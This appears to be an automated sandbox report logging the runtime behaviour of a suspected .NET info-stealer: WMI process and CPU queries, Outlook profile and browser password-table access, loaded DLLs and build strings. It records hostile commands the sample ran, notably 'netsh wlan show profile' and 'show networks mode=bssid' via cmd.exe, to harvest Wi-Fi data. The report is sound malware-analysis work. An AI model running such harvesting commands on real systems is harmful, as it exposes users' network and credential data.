                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile created: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_03
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeMutant created: \Sessions\1\BaseNamedObjects\UIWGELIQBFRB4M6IX13M
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
                            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6400
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA5ED.tmpJump to behavior
                            Source: K6aOw2Jmji.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: K6aOw2Jmji.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: tmpA60D.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: K6aOw2Jmji.exeReversingLabs: Detection: 68%
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile read: C:\Users\user\Desktop\K6aOw2Jmji.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\K6aOw2Jmji.exe "C:\Users\user\Desktop\K6aOw2Jmji.exe"
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr All
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6400 -s 3132
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profileJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                            Source: K6aOw2Jmji.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: K6aOw2Jmji.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: K6aOw2Jmji.exeStatic file information: File size 3747840 > 1048576
                            Source: K6aOw2Jmji.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x391a00
                            Source: K6aOw2Jmji.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: K6aOw2Jmji.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2161581368.00000267E97D4000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: winload_prod.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780733000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
                            Source: Binary string: System.Data.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA2567 source: K6aOw2Jmji.exe, 00000000.00000002.2163140895.00000267E9D10000.00000004.08000000.00040000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: ntkrnlmp.pdb\ source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780733000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
                            Source: Binary string: System.Windows.Forms.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.costura.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Drawing.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Management.pdbp source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: !costura.polly.core.pdb.compressed source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Drawing.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Numerics.pdbY9 source: WERD9EF.tmp.dmp.13.dr
